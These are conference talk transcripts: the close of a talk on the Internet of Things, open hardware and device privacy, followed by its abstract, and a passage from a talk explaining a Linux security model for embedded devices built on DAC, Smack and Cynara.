They do no authentication. They just broadcast information, you know, specifically when the sync bit or the Fitbit system just queries, are you a Fitbit? I would like your data now. And it gives me all of the data and then I upload it to the cloud. Unless I'm a middle party and I just collect your data. Now, to be fair, all I'm getting is a unique ID in your stuff, generally your step count, which, yeah, okay, fine. But I've got your unique ID, which means now I can track you. And if I have a big enough network of devices that can speak Bluetooth low energy, I can follow you everywhere. And yeah, but these are, you know, really great devices. I mean, heck, I've got one on me. And one of the conference organizers alerted me to this earlier. I didn't even know about this thing. This is a Wi-Fi enabled pet feeder. So this will monitor when your pet eats, how much it eats, and then it will dispense based on various criteria that's built into it. And it's connected to the internet. And you know, think about this for a minute. Hi. Oh, you know, I'm out on vacation for a weekend and Fido ate, you know, some food. Great, let's feed him some more. But what happens when it doesn't feed Fido for like a week? Because you're not home. I'm just saying, I'm not advocating that by any stretch of the imagination. I think that's a horrible idea. And of course, from the keynote this morning, everybody plays Pokemon Go, right? Everybody's on the blue team, right? What? No, you're not on Pokemon Go. Would you like an invite? No, I guess this isn't ingressed like it used to be. But you know, we've now got games that are generating chunks of hardware to help you play the game. And I mean, this isn't like a controller. This is just like a watch. That you know, when you're wandering around and you get near a Pokemon that your phone then tells the watch that you're near a Pokemon and you press the buttons so you can catch it. That's all it does. It is literally a Bluetooth low energy button and a small vibrating motor. This is the Internet of Things. These are the things we are building right now. And these are the things that are actually, I mean, these are obviously all things that are making it to market. Because there are things like Kickstarter and Indiegogo and everybody with half an idea, either software or hardware, is putting these things out. And some of these are absolutely amazing. I don't want everybody to think that I'm throwing these up there to mock them. Well, I'm kind of mocking them. But some of these devices are genuinely amazing devices. I mean, the Fitbit has actually gotten more people to go and do exercise by gamifying exercise than I have seen in my entire life. I've never seen a device that's actually been successful at getting people to go and walk a hypothetical 10,000 steps. We can argue about the accuracy of the 10,000 steps later. And there's people who are taking and monitoring, even just the home... I'm going to completely blank on the word. Climate control systems. People are now actually monitoring and watching what their houses and their buildings do better. And they're making changes, either to save energy or to realize, oh, well, I really don't need the air conditioning on today. Let's just turn it off. Because all of these devices are absolutely... Because this is a brilliant plan and I'm glad to be a part of it. Really IOT devices are both brilliant and horrible all at the same time. There's really no way to get around this. I have IOT devices sitting in my house right now. 
I've got a bunch of IP-based cameras. IP-based cameras are all made in China, whether they claim they're not is irrelevant. They're all made in China. And they all phone home. I've turned off everything for these... Every magical checkbox I can find in the firmware and they're all still trying to phone home. And why do I know this? Because I just threw them all on a VLAN, firewalled the VLAN off so that it couldn't connect to the Internet and I watched all the attempted traffic fail. These are brand name cameras. They're all trying to phone home. They're all trying to tell the company that made them something. And I have no idea what it is. They're not supposed to be calling home and yet they are. I've got a Z-Wave controller, which if you're not familiar with Z-Wave, it's one of the low power home automation type control systems these days. But the entire device lives in my house, runs on my network, it's great, it's all self-contained except for one small piece. It connects to the Internet to do authentication. I can't authenticate to my local device without going to a cloud provider that the manufacturer provides, log into their website at which point it redirects me back to the unit in my house. What could possibly go wrong with that entire scheme? Oh, and by the way, you can't control anything unless you're authenticated. I've been having words of that in particular manufacturer over that for a while now. I don't think they like me. But there's one thing here and most everybody in this room really isn't going to find this particularly amazingly weird or different or even just odd. It just is. These are the things that are here to help us actually solve all these problems because these devices are all being manufactured. I mean, you've all got cell phones in here. How many of you have Android? How many of you have Marshmallow on your device? So all of the people who had their hands up, 80% of them lowered them for the people at home. How many of you have, was the one before Marshmallow? Lollipop, thank you. How many of you have Lollipop on your phone? Not many. Kit Kat? How many of you have no idea what version of Android is on your phone? What? Okay. How many of you have six, which is Marshmallow? How many of you have five X something, which is Kit Kat? Oh, Lollipop, sorry. Version numbers are hard. Really, can somebody go and talk to Ubuntu about their naming scheme because I don't understand it anymore? I mean, you start with Warty Warthog? I accept the homage paid to me, not that I think that they did, but now we're on a completely different letter of the alphabet. I don't... Hey. How many of you are on 4.something on Android since I was asking questions about Android? Three? If any of you are on two, please just give me your cell phone. I will give you a new one. Are you seriously on a two-something? Seriously, a Moto E right now is $29 US, and you can run Marshmallow on it. So what you're really saying is that you haven't gotten a security update in like four years, four or five years. Do you know how many kernel security vulnerabilities there have been since then? You connect to the Internet? Do you use the browser? How many people think that's a really bad idea? You're all right. I'm ragging on it for no other reason that I want to use it as a point here is that devices are now getting made, and all of those devices that I showed, they're all made by companies, and they all have one real big goal. 
Make the thing, get it out there so that you buy it, and then move on to the next one. Because support's really, really hard in the long run. Car companies, cell phone manufacturers, nobody... I mean, even computer manufacturers in the general sense don't want to support things for more than a very small amount of time, because it's all cost to them. And you're buying devices at the lowest possible cost already, which means that their margins just basically don't exist. And so their want to support these devices for a long period of time is basically zero. And this presents an obvious problem, because then you end up with cell phones that are running Android 2.something when we're on Android 6.something. I don't even know what the absolute latest is. But the number of things that have changed or been fixed or been found to be a problem in those four intervening versions, that's at least four years. I think it's more like five with two something. It's crazy talk. But yet, there are still people, unfortunately, running around for whatever reason. I have no idea what your reason for it is, other than it's probably a really nice phone and it probably has a real keyboard. Yeah. Yeah, the real... Oh, man, I miss real keyboards on cell phones. Yeah, my typing has not gotten better without the keyboard. Tempting, except then I'd be running a cell phone with two.something. But here's one of the biggest things that's going to help all of us. And this is not a surprise to any of us in this room. I mean, you're here at an open source convention or conference. We all get this. If everything was open source, we could at least go and fix it. Because at some point, we all want to just go and fix things. We want to make it better, we want to change things. But open source only works so much if you've got access to the underlying hardware. I mean, we've all got cell phones. How many of you can actually get even root on your cell phone that you believe you can get? That's a much smaller handful of the people who said that they had Android phones or any phone in general. I mean, it makes it really hard to get access to these things because, again, the companies don't want to open these protocols. They don't want to open up their hardware, except that that's one of the things that can save us from the impending mess that we're all looking at. Open source hardware. How many of you have even heard of open source hardware? Oh, good. Good. I like all of you people. I don't have to explain this. Open source hardware is just one of those things that it makes everything easier. It gives you a really great starting point to build your own devices from. And honestly, once a company stops wanting to support something, why wouldn't they want to make it open source hardware? Because then people are going to go off. They're going to use it. They're going to maintain it. Now, admittedly, that also means that you're not going to buy the latest and greatest widget that they put out. Oh, OK. And there's a couple of projects here that use open source software and hardware, specifically the Minnowboard Foundation, which I happen to be a member of, and Beagleboard, which is another open hardware platform. These are devices that are out there that people are taking and using in all kinds of different ways. And you've got companies that are making open source hardware and using open source software and putting everything out there so that people can build stuff, add a fruit and seed and spark fun. 
And in fact, the device that's up there, the red PCB, is actually a small microcontroller called the ESP8266. Want to guess what it's really great for? Internet of things. It's got a Wi-Fi chip built into it. Honest to God, it's got a full Wi-Fi stack, including access point mode. That entire board, at least in US dollars, was $14.99 when I looked at it yesterday. $14.99 for an entire module itself. Just the module itself, not in that specific breakout board. You can get the chip that runs all of that for $5. I mean, I'm sorry? And even less, if you go with the, this might not be an official ESP8266 from Alibaba. That's true, they do all come from China. And yeah, I'm not going to get into that. I'm not going to get into that. I'm sorry? Well, I mean, this gets back to, yeah, I was going to say, this gets back to the pregnancy test device. They doubled the cost of the pregnancy test from $10 to $20 to add the extra functionality. But this is why they can do that, is the hardware is so bloody cheap. We are literally living in a golden age of computational performance. Yeah, it only does IPv4. Nobody cares about that IPv6 thing except everybody that should care about it. But yeah, I mean, we are literally living in a golden age of computational performance and cost. I mean, if you go back to when computers first created the ENIAC, this is a computer that would have taken up probably more than this room in floor space. And the amount of power and cost to run it was just astronomical. And nowadays, we have more computational power in my watch. It's just a little Android smart watch. There's more computational power in that than existed in the ENIAC. In fact, there's probably more computational power in my Fitbit than existed in the ENIAC. And these are devices that we're buying for a pittance for their computational capacity. I mean, the ESP8266 is probably faster than the 386, you know, a lot of us grew up programming on. And yet, I can buy that for as little as $5. And I can stick it into pregnancy tests and literally throw it away because it is now so cheap. I mean, think about that for a minute. Computation, computational power has gotten so cheap, we can literally use it once and throw it away. I mean, how is this not defined as a golden age for everything we're doing? And one of the most frightening things I could ever say is we are, you know, we are at the point where computational capacity is that inexpensive. And here's why all of those things actually help. No, this doesn't work. Please don't try this at home. I believe you'll actually short something really badly. And for those of you too young to realize what this all is, that's a parallel port connected to a parallel port, no modem adapter that's connected to a serial, parallel to serial port adapter that's connected to a serial port to PS2 adapter that's connected to a PS2 to USB adapter that's connected to a USB flash drive. No, this really doesn't work. I'm not even sure that power flows properly through that. And I think the power that comes out of a parallel port is 12 volt. So that's really not going to end well for the flash drive. 
But you know, and the reason open source software and hardware is really going to change the, is not only changing the world as it is, because a lot of the devices that, you know, that are in the Internet of Things are coming out of, or at least vaguely related to the open, the open source hardware that exists, is because people are taking all of these devices and they're doing things differently than what the manufacturer actually intended. I mean, how many people honest to goodness believe that that Bluetooth low energy device that's in the pregnancy test was actually intended for a pregnancy test device? How many people would have even thought of that? I mean, it's absolutely brilliant. You know, let's take a Bluetooth low energy device and this and let's, yes. This is great. Then we'll give them coupons. Or the connected fridge, or the connected oven. I mean, how many of you have backed something on Kickstarter? Oh, come on. Don't lie. Just because it didn't show up at your house doesn't mean that you didn't back it. Okay, fine. But I mean, there's a lot of the, I mean, people are just coming up with ideas and these have all existed before. But things have gotten so cheap and so easy to do either because open hardware now exists and is making this more approachable, or making the hardware more approachable to software people or the hardware, or from the hardware perspective, the software is now more approachable because we've got open source software that's now pervasive in everywhere. But these are things that everybody's got, everybody's using. And they're going to take every piece of either software or hardware and they're going to use it in ways that we have never even imagined. How many people, I mean, we're all software people here, right? No hardware people in the audience, right? I know it's really gosh, I'm actually a software person that's turned into a hardware person so it's kind of weird to be talking at software conferences now. Because, you know, like, oh, I want to really talk to you about this weird transistor that I found and then everybody's like, what's a transistor? Where's my for loop? But how many people have seen their code used in ways that they would never have even thought of? One. No, that can't be it. Do you guys all, like, work on really boring things? I'm hearing a lot of yeses. I'm sorry, there's some really neat, I've got some really neat storage stuff that I'm working on if you want to come help. It's at least probably, well, actually it's storage, which means by definition it's boring. But I mean, go find it, I mean, even software is being used in ways that nobody even remotely thought of. I mean, some of the hardware boards that I've been making lately, it takes me 12 different programs to get an image to it actually showing up on a piece of hardware. You know, just like even an outline for a PCB. It takes me 12 programs. And I'm sure that, you know, 10 of those programs, actually probably 11 of those, never thought that they'd be used in PCB design. I mean, Inkscape, GIMP, Image Magic. How many of these sound like PCB design tools? Oh, okay, somebody's done hardware design. But you know, everything that we do and everything that we touch these days is going to be used in ways that we're never going to understand or that we're never going to predict, which leads to two obvious statements. The first is, stop believing that you know what your users are going to do with your software and start listening to them. 
Because they're going to go and do things that make no sense to you. And they're going to ask for features that seem absolutely ludicrous. But it may just be that your tool is less bad than everything else they can use. And that's why they're trying to solve their own problems with it. And two, just be open to the possibility that, oh gosh darn it. And again, the magic of Linux and presentations, we'll see if that didn't come back. Because if things are open, we at least have the power to fix things. Because I'm sure nobody in this room has never run into a bug on a piece of software that they're using and immediately gone, screamed bloody murder, written a patch and submitted it. No one, right? No one? Good. Because I'm sure I've received several of those at some point. But if we're doing this in the open and we're doing this in hardware and we're doing this in software, we actually have the chance to fix things. Which means that all of those weird comments I had about IoT devices earlier, even if they're not fixable when the device comes out, if we have the opportunity to go and fix them later, this means that we as an entire society are safer and better off. And again, everything is going to get used in ways that you've never even remotely thought of. This is a conference badge, an electronic conference badge that was from a security conference two years ago. At the conference, someone turned it into a quadcopter. And honest to God, it flew. There's video on YouTube of it flying. And I can't... And I... Honestly, while I was doing this presentation, I could not think of a better example of people who are going to use things in ways that you would never even remotely thought of. This is a conference badge that has a bunch of blinking LEDs and some touch pad areas and some through hole pins that you can attach more things to it. And what did they do? They made a quadcopter and they flew it. And this... But I wanted people to start thinking about not what they're trying to do, but what their devices or their software could be used for. You know, yeah, don't ignore your major focus, but accept that the world is changing, it will always be changing, and people are going to do things in ways that you could have never expected. And I'm running slightly fast, so hopefully you guys have a lot of questions, and not about the flaming octopus with a replica of canine sitting next to it. Well, you can ask questions about it too. I will happily answer them because I built the canine. I did not build the giant flaming octopus. So questions, comments? That photograph was taken at the San Francisco Maker Faire. I believe three years ago. Two years ago. Two and a half years ago. Where do you get one? No, I'm not going to answer him. Canine, you can build the octopus. You have to go to San Francisco. Yeah, okay, so the question is, I'm going to repeat that. How does open hardware save us from the security, or the lack of security that may be coming out with existing devices? So depending on how this all works, it can't. Because a lot of companies are not going to open source their designs. They're not going to give you the ability to do anything with their designs. And this is kind of why I pointed out the WRT54GL, is because Lynxus never expected anybody to go and start modifying the firmware on the device. And yet people like us in this room were dedicated enough to go, there's Linux in this thing. I want to be able to control it. I need to be able to change it. 
And they went and they opened the device and they started figuring this out. Open hardware makes this easier because at least at some point you can publish all of this and you can save everybody in this room an absolute ton of time and effort, reverse engineering what's already been made. And I'm not saying that when a product comes out, it has to be immediately open source hardware. Maybe you run on a cycle that every two or three years as a device literally falls out of favor, out of use, you open source the design. Because then at that point, the poor gentleman who's got the Android 2.0 something phone, he could at least try, if he's got open specs to every piece of that hardware, he could actually try and get Marshmallow running on the device. But in all likelihood, because the device has been closed, the manufacturer doesn't want to support it anymore and probably half the people who worked on that particular platform are gone from the company. There's no mind share left to even remotely go and work on that device. So while I'm making an advocacy play here for open hardware because it gives everybody a chance maybe not necessarily right at the beginning, but eventually to be able to go in and modify and change things that that's beneficial. But if the company starts from a point of open hardware, this actually encourages them to come back and give it back to the open hardware world. There are companies that are taking, and I can speak to this, that are taking the minnow board and they're putting it into products right now, and they're changing things about the board, but they're also giving those changes back. I mean, they're kind of required to because of our licensing, because we're CC by SA, so that magical SA bit means that they have to give it back, kind of like the GPL. But these are companies that are still making money on product. They're manufacturing things, and yet just because anybody can take this and make it themselves, these companies are still making money, they're still seeing a profit there. So this kind of starts putting a nail in the coffin of, oh, well, if we open this up, we'll never make money. So I know that's kind of a roundabout way to answer your question, but it's... Okay, so I'm going to paraphrase this slightly. What is my understanding of open hardware with respect to the chips themselves and whether the chips or whether I would consider chips that may have open data sheets that you can go and look at to be open or not? Is that kind of the direction? Because you're talking about, is there even the point of, is it better to go down the FPGA route where you may control more of the hardware or at least the hardware design? So I actually follow the open source hardware associations model pretty closely from my personal belief. And generally speaking, I see open hardware as something that I can go and I can modify and I can change on my own, which is kind of what the GPL says about software anyway. But that doesn't necessarily mean that things like the atom chip that's on the minnow board. Yes, most of the specs for that particular chip are open, they're known, but things like, frankly, the microcode is not. Does that make the Intel chip that's used on it not suitable for open hardware? That ends up in a mostly religious argument over whether you believe that any closed piece means that you can't, or closes the entire design or not. 
And I would argue it does not because frankly building, I've got an open hardware design and I can pick and choose what pieces I put on there. That also means that I have the ability to choose what pieces may or may not work for me. So let's say that a transistor doesn't have an open enough data sheet for my purposes. I can at least have the opportunity or the possibility of going and finding another one that may have a more open data sheet. Now, admittedly, it's a transistor, there's three pieces to it. It's kind of hard to not understand what it is, but you can scale this to any piece of the design. Does that mean that you're going to be able to find everything that would work for you? Maybe, maybe not. It's a tough call. Oh, no. No, I would absolutely include things like FPGAs in the open hardware movement. I mean, they're just another piece that may or may not be on your design. You could replace the entire CPU on a lot of the open hardware boards now with an FPGA and then you control the entire, I'm going to put in quotes, the SOC itself. But I'm not saying that an FPGA is exclusive to open hardware and I'm not saying that the pre-baked ICs are exclusive. I mean, everything is in that space. I think asking for anti-devices that don't call home is like asking for use papers without commercial. But you save them with your money and watch some of your data and I think it's a difficult to ask for. I agree. And again, this kind of comes back to some of my commentary about the normal user base. Well, I would like my devices really desperately not to call home. There's a lot of people who, I mean, I have multiple VLANs in my home network. I'm really weird though and I accept that I'm like, normal people are over there and I'm somewhere in the next county over in comparison to how my network is set up. And I agree. I would like the option to really tell these companies I really don't want to call home. Really I'm going to go live in my own little microcosm. I am the outlier in this case. I am not the normal case. I am not the normal situation. But it would be awfully nice if I had more direct access over the software stack or even the hardware stack that exists in these devices that I could go and disable that, modify it or just write my own IP stack for my cameras, for instance. Would you say, all this much for a device? Personally, I would pay substantially more. But as far as I can tell in a lot of cases, these options don't even exist. So at this point, my choice is I can't get the feature I actually want, which means I'm going to go and pay the cheapest amount that I can to accomplish my goals and then take a giant band hammer at my firewall and turn off their ability to go out to the internet. Yes, that screws up some functionality. Lights. Oh, yes, I absolutely missed. I don't know how I didn't put an internet-connected light bulb up there. And yes, I completely forgot to add those. If you really want to see some of the most interesting hacks in the world, go look up the hacks for the internet-connected light bulbs. Those things are some of the most redonkulously badly-goed devices in the world. But they're really cool. You could have blinking lights nationwide. International-wide. Worldwide. Yeah. Sadly, I think that there may be enough infected light bulbs out there that that... That could actually be done at this point. Anyone else? Questions, comments? I mean, I'll be around. So if you've got anything more specific you want to chat with me about, by all means. 
Otherwise, I will give you back the, I believe, like three minutes or five minutes of your day. Thank you.
|
We now live in a golden age where computational power has gotten so cheap and so low-energy that computers are entering into everything. We now have devices that can sit on your wrist for days, alerting you to dynamic events, keeping track of your motion and steps, connecting to wireless networks and reporting all this data, as well as Bluetooth-enabled pregnancy tests. Let's explore this new world we are entering, in both its glory and its bizarreness, realizing just how much power we have for both good and evil, and how being open about things, hardware and software, can help us all.
|
10.5446/32439 (DOI)
|
Okay, shall we start? Welcome everybody. My name is Aleksander Zdyb. I come from Poland, but currently I'm based in Switzerland. I'm going to tell you about a modern security model for Linux operating systems. Why might you be interested in this? Well, this particular model is meant for embedded systems like smartphones, smartwatches, smart TVs and so on. And it's probably unlikely that you will have to design such a kind of system in the nearest future, because there are already many of them, like Android, iOS, Windows, and Tizen, even if you haven't heard of it before. But if you were at John Hawley's presentation about IoT devices yesterday, there are going to be a lot of them, these IoT devices. And each of them is going to run on some system, probably a dedicated one, but maybe not. And they will really need some security. By the year 2020, there are going to be 10 million of us developers focused strictly on IoT devices. So there will be a lot of work on these devices and these devices will need to be secure. And I'm going to present a choice of security framework you can use on these devices if you happen to design or develop a system for such devices. Well, what am I going to tell you about? First of all, about security considerations, the security requirements of embedded devices. How are these requirements different from, for example, desktop computers or servers? Why is it important? Next, what is the mission to accomplish in order to have this security in place and working? Next, we're going to focus on some technical details, implementations and so on. At the end, we have a short summary and, if time allows, a short Q&A session. So what about these security requirements, or why do we need security on embedded devices? There are a lot of IoT and other embedded devices right now. And the pictures above are just pretty usual right now. We use more and more embedded devices and we store more and more private data on them. And these ones like smartphones, smartwatches, tablets, TVs are probably known to store such kind of data. But there are more. Yesterday, you could see that there are thermostats, thermometers, even pregnancy tests with connectivity, like John showed yesterday. And sometimes we are not even aware that these devices are surrounding us and that they gather and store and share information about us, about our environment. However, there is some data on them, flying between them, and it needs to be secure. So maybe a simple example. You can see two similar pictures, one taken on Ubuntu, the second taken on Android. This is a screen showing installation of software on the corresponding devices. What's the difference? I mean, both have the name of the application, some descriptions, some nice screenshots. But what's the difference between a desktop computer like Ubuntu and an embedded mobile device like Android in this case? Well, when you try to actually install the application, in the first example you are presented with a password prompt to authenticate, so the system knows that you allow installing and using this application. On the second picture, there's more. There are privileges that the application will be using. And that's the main difference. Let's go further. So Ubuntu in this case is using what I call the classic security approach. I mean, an installed and run application acts on behalf of the user, on behalf of us, to the full extent. The application, once run, can do whatever we would do, whatever we could do while sitting at the terminal with our keyboard, with our mouse, and so on.
On Android, for example, there's something different. The application, of course, also acts on our behalf, but not to the full extent. It is limited to the very specific actions it can do. So what about these operating systems run on desktops and servers, maybe, compared to mobile or embedded devices, IoT devices, for example? So the operating system isn't just a piece of software that consumes space on our disks and hogs our CPUs. It governs some helpful services, some precious resources, and it helps us in using them. Of course, there are many resources and services like the ones presented here, for example, email, camera, networking. There's not even a point in distinguishing them into services and resources. They may provide some services and have some resources at the same time. It doesn't matter. They live in our operating system and serve us in some way. But the real point here is that with these services and resources, we, or our applications, can do some specific things, can do some specific actions. Like for example, with email, you can read and write emails, you can preview your contacts; you can use the camera for taking photos, or maybe this very same application also allows you to browse already taken photos, and so on. The real point here is that with these services and resources there are some actions connected, and these actions are further connected with privileges. I mean, if an application is going to use, for example, the email service, you should be able to tell that it may read and write emails, but maybe couldn't preview all of your contacts and so on. But of course, these services and these resources are not only for you. I mean, who's going to use Telnet to read emails or write emails? You need some applications in your operating system, and they are really helpful. You can use your clients, browsers, games, whatever. And in the classic approach to security, like in the presented Ubuntu, but it isn't limited to Ubuntu, it's rather a class of systems like desktops or servers, all these applications once installed have all your privileges. They can act on your behalf. So all of these applications you install have the same rights as you, to camera, internet, location services, contacts, and so on. The point is not to disallow the applications from doing so, but there is a point in limiting this access, because it's probably a good thing that maps have access to location services. Maybe even the camera could have this access, to geotag the taken photos, but probably a calculator or games shouldn't have access to the camera or contacts. So what we need is access control to these services and resources. And what do we need to do so? Well, we need to separate things inside the operating system. First we need to separate users, to tell them apart. This one user can access location services, the other one doesn't. And we need to distinguish, to tell apart, the applications. Like maps have access to location services, but games do not. And the first constraint, I mean the separation of users, is already there in Linux systems. And the separation of applications is a whole lot larger and more complex, and the rest of the presentation today is mainly about this. But the solution to this problem of separating users and applications is already there. It's implemented. I'm one of the developers who implemented it. And I'm going to present it to you.
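To make the problem concrete before looking at the solution, here is a minimal sketch in C; the file path is invented for illustration. Under the classic approach, plain file permissions only check who runs a process, not what that process is, so any program the user starts, a game or a calculator just as much as the contacts app, can read the user's private data.

/* Minimal sketch: under classic DAC, any program started by the user
 * runs with the user's full rights, so a "calculator" can read the
 * user's address book just as well as the contacts app can.
 * The file path below is hypothetical. */
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* Nothing here asks for a "contacts" privilege; plain file
     * permissions only check who runs the process, not what it is. */
    FILE *f = fopen("/home/user/.local/share/contacts.db", "rb");
    if (!f) {
        perror("fopen");
        return EXIT_FAILURE;
    }

    char buf[256];
    size_t n = fread(buf, 1, sizeof(buf), f);
    printf("read %zu bytes of private data without any extra privilege\n", n);

    fclose(f);
    return EXIT_SUCCESS;
}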
All of the stuff I'm going to present today is open source, so every one of you can take this, try this, and implement this in your setups. It doesn't have... Can you speak a little bit louder? Oh, sorry. I will try. Okay. So every one of you can take this and implement it, apply it to new systems, existing systems, and, as you will hopefully see in the demo I'm going to present, it's not only limited to embedded devices, but we can go beyond this. That will come. So the security model I'm presenting was originally, initially developed for the Tizen operating system. It's a plain Linux distribution. It's meant mainly for embedded and mobile devices. It's open source. It's already shipped on many devices like smartwatches, smartphones, smart TVs. But there are more of them, I mean more products which are using some parts of this security model, and these are just examples of usage. So this new security model consists of three pillars: discretionary access control, a Linux security module, in this case Smack, and a new one, the user-space-based Cynara. I'm going to go through all of them. First is DAC. You have probably heard about this. Even if you haven't heard of it, you are really using it every day. It's just the plain old security model present in Unix for like 40 years. You know the commands like change owner, change mode and so on, and this is it. It's used to separate users and their resources. You probably all know how to allow access to your files on Linux systems to some group or users, and this is it. You can have access types of reading, writing, executing and so on. There's really not much to say; it allows us to fulfill the first requirement, separating users. And this is the first pillar, and it is used for this. The second is Smack. Who has ever heard of Smack? Okay, some of you. Maybe SELinux rings more bells. Yeah, it's something like this. Smack is one of the Linux security modules. It allows us to restrict access to resources, but in different ways than DAC does. In operating systems, you have some entities, like processes or files maybe. And you can, thanks to Smack, label them. For example, you have a file on the file system and you can give it a label, in the example label two. And it's a file on our disk. And there's a process, for example, which is labeled with label one. And we can have some rules which tell what actions the subject, for example a process, labeled somehow, can do on an object labeled maybe differently. If they have the same label, then the access is unrestricted. But if the labels are different, there are rules which tell that the subject with this label can read but not write the object labeled differently. And of course, many objects and many subjects may have this very same label. So for example, all files in one of the directories can be labeled with the same label. So a process with the right rules can access all of them. And maybe another process, without rules to access these files, will not have this access. There are some conventions for labeling objects and subjects in the operating system. I mean, it depends on you, but the security model I'm presenting uses this convention. For example, there is the floor label, an underscore, used to label read-only system directories. There is the label User to label files in the directories of users and so on. But it is just a convention for simplicity and for ease of administration.
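As a rough sketch of what such a rule looks like in practice: Smack rules are plain text lines of the form "subject-label object-label access-string", and a sufficiently privileged process (CAP_MAC_ADMIN) can load them through smackfs. The labels below are invented, the smackfs mount point is assumed to be /sys/fs/smackfs (older setups used /smack), and in Tizen this is normally done by Security Manager and libsmack rather than by hand.

/* Rough sketch: load one Smack rule ("subject object access") by writing
 * to smackfs. Assumes smackfs is mounted at /sys/fs/smackfs (older systems
 * used /smack) and that the caller has CAP_MAC_ADMIN. In Tizen this is
 * normally done by Security Manager / libsmack, not by hand; the labels
 * here are invented for illustration. */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    /* "Processes labeled App::Maps may read and write objects labeled
     *  System::Location" (access string: r = read, w = write, x = execute,
     *  a = append, t = transmute). */
    const char *rule = "App::Maps System::Location rw";

    int fd = open("/sys/fs/smackfs/load2", O_WRONLY);
    if (fd < 0) {
        perror("open load2");
        return 1;
    }
    if (write(fd, rule, strlen(rule)) < 0)
        perror("write rule");
    close(fd);
    return 0;
}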
And this brings us to the third pillar. The former two have been in Linux for a long time. DAC has been in Linux from its very beginning and even longer in Unixes. Smack, I believe, has been in Linux since 2008, and other Linux security modules since the beginning of the century. But this third one is something new. First of all, it's not in kernel space like the former two. It's a user-space one and it's dedicated to the presented solution. How it works, I will explain in a moment. And this is it. For example, in DAC you have access rights for files: whether the user or some group can read or write this file. In Smack you have labels: a subject with this label can read or write an object with another label. Here it's different. For example, we have a service, say a location service like GPS, and we have some application in the operating system, like maps. Maps connects to the location service and requests the current location of the system, of the user of the system. But how does the service know if this particular application can access location? Well, it doesn't. It could have some mapping, some database with the answer to this question. Yes, maps can have location. Calculator cannot. It may work, but it will probably be static, just a static mapping or database. And the second thing is that every service in the operating system would need a similar mapping or database. Well, it's not a good solution. What I propose is Cynara. It's that kind of database I was just talking about. It knows all the answers for this kind of question. Is this maps application allowed to use location services? Is Facebook allowed to use contact lists, and so on? Cynara is a database, really, but a sophisticated one. It can store entries statically, like: yes, Facebook has access to contact lists. But it may also compute these answers at runtime with some extensions. For example, if you're familiar with iOS or newer Android systems, you could be presented with a pop-up asking if this application, at this time, can have access to some service or some resource. And in the end, Cynara computes the answer and returns it to the service. And this answer is distinct, yes or no. So it knows if this particular request can be served or not. How does Cynara know all these answers? There are some sane defaults built into the system. There are manifests of installed applications. If you're familiar with developing for Android operating systems, then you know what a manifest is. It simply tells the operating system which privileges are going to be needed by the application, and the user can accept them or not. There's the privacy manager. If you're familiar with newer Android systems, then you know that at runtime, after the application is installed, you can grant or deny some of the privileges. And this is it. One day you may accept Facebook using your contact list, but the other day, it doesn't have to be so. And at the end, there's also the administrator role, who can alter all these choices. So how does it work in practice? I mean, what happens in the life cycle of an application, what actions are done? But first, there's another component of this solution. It's called Security Manager, which is the main hub for all this information. It's also a dedicated program. It is used in many different aspects, in many different steps of the life cycle of applications. For example, it takes part in installing and launching applications. It manages different policies and rules in the system. It's a hub where the administrator or users can do their work to manage the rules in the operating system.
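Before going through the application life cycle, here is roughly what the check looks like from a service's point of view, sketched with the libcynara-client C API as used in Tizen; the exact header, function and constant names may differ between versions, and the label, UID and privilege strings below are made up.

/* Sketch of a service-side check with the libcynara-client C API, as used
 * in Tizen; exact header, function and constant names may differ between
 * versions. "client" is the Smack label of the calling application, "user"
 * its UID as a string, "privilege" a privilege name. Values are made up. */
#include <cynara-client.h>

int location_allowed(const char *client_label, const char *uid_str)
{
    cynara *cyn = NULL;
    int allowed = 0;

    if (cynara_initialize(&cyn, NULL) != CYNARA_API_SUCCESS)
        return 0;                       /* fail closed */

    int ret = cynara_check(cyn,
                           client_label,  /* e.g. "App::Maps" */
                           "session-1",   /* simplified session id */
                           uid_str,       /* e.g. "5001" */
                           "http://tizen.org/privilege/location");

    allowed = (ret == CYNARA_API_ACCESS_ALLOWED);
    cynara_finish(cyn);
    return allowed;
}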
So the first step in the life cycle of the application is, of course, installation of this particular application. There are files unpacked, but that's really nothing interesting. The more interesting thing is that after putting the files on the file system, we grant access with DAC. For example, we apply access rules for who can read the files. Next, we label them with Smack labels, which means we tell what processes can access the files, what processes can access other processes, and so on. Next, the application is run. The main step in this launching process is applying the so-called security context. An application in this security model has to have this security context, which contains not only the Smack label the process of the application runs with, so we can use these Smack rules to allow accesses between processes and files, for example, but also the groups it runs with. It's also important because with groups we can have access to files and to devices, to this particular device. So how does it work in practice? As I told you before, in the simple example, there is this GPS service. It has probably just received a request from some kind of application, in this example maps, to read the location. And as I told you before, it needs to ask Cynara if this access is granted. So what's there? What really happens? First of all, as I told you regarding this mission of separation, we are able to distinguish users and processes. So the GPS service in this particular example can tell what user is running this maps application and what this maps application really is. I mean, how is it different from a calculator application? So it has the UID of the user running this maps application and it has the Smack label of this maps application. It's worth noting that all applications of the same kind, I mean from this same executable, are run with the same Smack label. Even if they run with different UIDs, for example Susan and Bob, Susan's maps has the label, for example, maps, and Bob's maps application, if it's the same application, runs with the very same Smack label. The GPS service knows these credentials, the UID of the requesting user and the Smack label of the application. And it forwards them to Cynara with the request, with the question whether this pair (the so-called client, which in this case is the label of the application, and this particular user) can have access to the privilege. In this example, it's the location privilege. Cynara is calculating the answer. It may come directly from that database. It may be calculated, computed by external plugins, like a pop-up, like maybe contacting some external service, even maybe a Windows domain, whatever. And the GPS service gets the answer right back and it's distinct. It knows it's yes or no. Grant access or deny access.
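If the service listens on a plain Unix socket, it can obtain exactly these two credentials from the kernel. The sketch below uses the standard SO_PEERCRED and SO_PEERSEC socket options (under Smack, SO_PEERSEC returns the peer's label); error handling is trimmed, and for D-Bus services this kind of lookup is handled by the bus.

/* Sketch: how a service on a plain Unix socket can learn who is calling.
 * SO_PEERCRED gives the peer's UID; SO_PEERSEC gives the peer's security
 * label, which under Smack is the application's label. Standard Linux
 * socket options; error handling trimmed for brevity. */
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>

void identify_peer(int client_fd)
{
    struct ucred cred;
    socklen_t len = sizeof(cred);
    if (getsockopt(client_fd, SOL_SOCKET, SO_PEERCRED, &cred, &len) == 0)
        printf("caller uid: %u\n", (unsigned)cred.uid);

    char label[256] = "";
    socklen_t llen = sizeof(label) - 1;
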